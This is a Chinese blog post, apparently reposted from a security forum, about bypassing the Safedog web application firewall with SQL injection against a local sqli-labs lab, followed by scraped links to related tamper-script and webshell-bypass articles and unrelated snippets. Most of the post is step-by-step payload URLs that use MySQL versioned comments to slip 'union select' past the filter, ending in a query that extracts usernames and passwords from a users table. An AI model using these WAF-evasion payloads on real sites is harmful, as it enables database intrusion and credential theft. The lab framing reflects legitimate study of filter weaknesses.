在t00ls 里面我发的,放博客分享 记录一下

小菜写文章,太菜 希望大佬放过我!

 主要分享一下,绕狗的思路
环境:windows7 + phpstudy + safedog v4.0  + Mysql 5.2

cms: sql-labs

Mysql 注释符:#  -- /**/

0x01:
注入点:http://192.168.89.132/Sql/Less-1/?id=1

先从 and 1=1 绕过

http://192.168.89.132/Sql/Less-1/?id=1' and 1=1%23

有看过一些前辈的文章,多数都是利用注释符绕过 比如用 /*xxx*/

?id=1%27and/*xxx*/1=1/*xxx*/%23 (以前 前辈的文章 xxx 进行 字符随机 绕过)

然后我就直接用前辈的怼了一下,发现安全狗拦截 

想起CTF的  SQL 函数 进行FUZZ 套路,
首先 我放了一个 and   进去

http://192.168.89.132/Sql/Less-1/?id=1' and    (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' and  1=1  (安全狗拦截) 是空格出现的问题吗?  想到之前看过的文章 把空格 替换成 /**/  或者 /*xxxx*/ 
发现依旧拦截

http://192.168.89.132/Sql/Less-1/?id=1' an1d 1=1(安全狗不拦截)  这里SQL 语句报错, (单个 放and ,单个放 xxx=xxx 安全狗并不拦截 )     在and 和 xx =xx 放在一起进行了拦截

所以把 and xx=xx  的固定格式进行扰乱  把xx=xx 看做一个整体 放在/*!*/xx=xx/*!*/ 让waf匹配不到

and/**/1=1/**/  (安全狗拦截)

and/*!*/1=1/*!*/  (安全狗不拦截)

0x02:

现在 尝试 order by

http://192.168.89.132/Sql/Less-1/?id=1' order by   (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' order by  1(安全狗拦截)

按照刚刚的思路 进行模糊测试

http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截)

汇总不拦截:
http://192.168.89.132/Sql/Less-1/?id=1' order by   (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截)

现在用刚刚 绕 and 1=1 的思路  来绕 order by

http://192.168.89.132/Sql/Less-1/?id=1' /*!order*/ by 1(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order /*!by*/ 1(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order by /*!1*/(安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1' order by /*!*/1/*!*/(安全狗不拦截)

0x03:
流程:
1. 判断存在注入  绕过测试
2. 判断列           绕过测试
3. SQL查询语句  绕过测试

SQL查询语句 绕过  这里以(union select 测试)

http://192.168.89.132/Sql/Less-1/?id=1' union select   (安全狗拦截)

测试了几组

http://192.168.89.132/Sql/Less-1/?id=1' union/*!*/select/*!*/
(安全狗拦截)

http://192.168.89.132/Sql/Less-1/?id=1' union /*!select*/

(安全狗拦截)

http://192.168.89.132/Sql/Less-1/?id=1' /*!union*//*!select */(安全狗拦截)

 发现刚刚的操作 不行了  于是乎 /*!50001*/ 这样想走一波   发现也不可以  这里我就不解释/*!50001*/  大佬们都知道

因为我记得去年 第一次绕狗的时候,还截图纪念了一下 用 /*!50001*/   附一下老图:

以前绕的payload:'/*!50001union*//*!select*/user,passwor fromusers
--   (可以多看一些前辈文章,即使老的payload 绕不过去了,思路太可贵了!)

后来想了一下继续打乱的方法
/*!90000xxx*/ 这样就可以  , 这里的xxx 是不执行的    但是可以起到扰乱的效果,  也就是在基础的/*!*/ 加点料

到这里还是采用了 0x01 的思路
and/**/1=1/**/  (安全狗拦截)

and/*!*/1=1/*!*/  (安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=1%27union/*!90000aaa*/select/*!90000aaa*/%201,2,3%23  (安全狗不拦截)
http://192.168.89.132/Sql/Less-1/?id=1%27union/*!90000aaa*/select%201,2,3%23  (安全狗不拦截)

union/*!90000aaa*/select/*!90000aaa*/from  (安全狗不拦截)
union/*!90000aaa*/select/*!90000aaa*/from users (安全狗拦截)

模糊测试拦截位置
union/*!90000aaa*/select/*!90000aaa*/from us111ers (安全狗拦截)  更改了原本users  这里是为了猜测user 是否敏感

union/*!90000aaa*/select/*!90000aaa*/fr111om users (安全狗不拦截)

猜想 from xxx 拦截?

from xxx 
(安全狗不拦截)

union/*!90000aaa*/select/*!90000aaa*/from users

union select from xxx   也就是说 union select 是一个整体 在加上 from xxx会拦截

那么我把from xxx再放起来

http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,2,3/*!90000aaa*//*!90000aaa*/from%20information_schema.tables/*!90000aaa*/%23(安全狗不拦截)

http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,username,password/*!90000aaa*//*!90000aaa*/from%20users%20limit%202,1/*!90000aaa*/%23 (安全狗不拦截)

后面写了一个安全狗的tamper

绕狗的方法还有很多,继续学习·····

安全狗其实用参数污染 绕更方便一点。

绕最新版安全狗-附上sqlmap的tamper的更多相关文章

  1. 关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)

    sqlmap中tamper脚本分析编写 置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗 ...

  2. 使用sqlmap中tamper脚本绕过waf

    使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap- ...

  3. (四)SQLMap之Tamper篡改脚本的类型、作用、适用场景

    目录结构 一.SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二.适配不同数据库类型的测试tamper 三.SQLMap中tamper篡改脚本的功能解释 一.SQLMa ...

  4. sqlmap中tamper脚本绕过waf

    0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习. 根据sqlmap中的tamper脚本可以学习过绕过一些技 ...

  5. SQLMAP之tamper详解

    sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 P ...

  6. 绕过WAF、安全狗知识整理

    0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐.安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 ...

  7. sqlmap 使用总结

    一直在用sqlmap,一直在浅层的使用方面,所以我想深入了解一下sqlmap. 参考文章: Sqlmap使用教程[个人笔记精华整理]        http://www.vuln.cn/1992 sq ...

  8. SQLMAP大全

    转自:http://blog.csdn.net/zsf1235/article/details/50974194 本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用 ...

  9. 绕过D盾安全狗连接菜刀

    0x00 各种奇葩符号 现在基本上没啥用了,毕竟几年前的小玩意儿 /;.xxx.asp;.jpg /;.asp/.jpg 像这种各位看官可以忽略了,毕竟某狗和某盾也不是吃干饭的,写出来只是为了纪念一下 ...

随机推荐

  1. Eclipse MAT 安装及使用

    Eclipse MAT官方网页:https://www.eclipse.org/mat/downloads.php 一.MAT是什么? MAT(Memory Analyzer Tool),一个基于Ec ...

  2. 如何解决Java警告信息:"objc[31336]: Class JavaLaunchHelper is implemented in both places ..."

    在macOS High Sierra Version 10.13.6下使用Intellij在Java 8上执行Java程序,console中会打印如下警告信息: objc[31336]: Class ...

  3. 原型模式-Prototype(Java实现)

    原型模式-Prototype 通过复制(克隆.拷贝)一个指定类型的对象来创建更多同类型的对象. 就像去蛋糕店买蛋糕一样. 柜台里的蛋糕都是非卖品. 只是为顾客提供一种参照. 当顾客看上某一个样式的蛋糕 ...

  4. css中自定义字体

    css代码如下: @font-face { font-family: 'HelveticaNeueLTPro-Th'; src: url('../fonts/HelveticaNeueLTPro-Th ...

  5. LinkedHashMap源码分析及实现LRU

    概述 从名字上看LinkedHashMap相比于HashMap,显然多了链表的实现.从功能上看,LinkedHashMap有序,HashMap无序.这里的顺序指的是添加顺序或者访问顺序. 基本使用 @ ...

  6. PMP知识点(一)——风险登记册

    一.Reference: [管理心得之四十八]<风险登记册>本身的风险 问题日志与风险登记册的区别与联系 PMBOK重要概念梳理之二十六 风险登记册 风险登记单-MBAlib 二.Atta ...

  7. python3 练手实例8 批量命名图片

    #coding:utf-8 import os import tkinter as tk from tkinter import filedialog root = tk.Tk() root.with ...

  8. JavaWeb处理GET、POST时的编码乱码问题

    对于GET方法,只要设置了res.setContentType("text/html;charset=UTF-8"), req.getParameter()就不会产生乱码. 对于P ...

  9. 解决MySQL Access denied for user 'root'@'IP地址' 问题

    1.mysql -u root -p 登陆进MYSQL: 2.执行以下命令: GRANT ALL PRIVILEGES ON *.* TO 'your name'@'%' IDENTIFIED BY ...

  10. axios formData提交数据 && axios设置charset无效???

    但是这样会出现一个问题,什么问题呢? 我设置了请求头编码utf-8,但是没生效 content-type里面没有出现utf-8???????查了很多资料,说这是axios固有的bug,我....... ...